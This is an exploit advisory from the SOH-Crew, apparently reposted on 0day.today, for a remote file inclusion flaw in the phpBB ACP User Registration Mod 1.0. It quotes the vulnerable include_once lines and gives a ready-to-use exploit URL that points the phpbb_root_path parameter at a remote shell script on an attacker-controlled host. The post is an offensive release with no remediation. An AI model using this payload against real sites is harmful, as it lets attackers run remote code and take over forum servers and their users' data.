phpBB ACP User Registration Mod 1.0 File Inclusion Vulnerability

🗓️ 13 Oct 2006 00:00:00Reported by bd0rkType

zdt🔗 0day.today👁 34 Views

phpBB ACP User Registration Mod 1.0 File Inclusion Vulnerabilit

================================================================
phpBB ACP User Registration Mod 1.0 File Inclusion Vulnerability
================================================================



          ..%%%%....%%%%...%%..%%...........%%%%...%%%%%...%%%%%%..%%...%%.
          .%%......%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%...%%.
          ..%%%%...%%..%%..%%%%%%..%%%%%%..%%......%%%%%...%%%%....%%.%.%%.
          .....%%..%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%%%%%%.
          ..%%%%....%%%%...%%..%%...........%%%%...%%..%%..%%%%%%...%%.%%..
          .................................................................
        
               phpBB ACP User Registration (MMW) Mod 1.00 File Inclusion Vulnerability


Date: 2006/10/13
Time: 18:20:57 => GMT+1:00

Founder: bd0rk || SOH-Crew
Greetz: Perle, Tr4ileR, nukedx


Code: include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);
include_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);
include_once($phpbb_root_path . 'includes/bbcode.' . $phpEx);

[+]Exploit: http://[target]/[directory]/includes/functions_mod_user.php?phpbb_root_path=http://Sh3llScript?




#  0day.today [2018-01-02]  #

13 Oct 2006 00:00Current

7.1High risk

Vulners AI Score7.1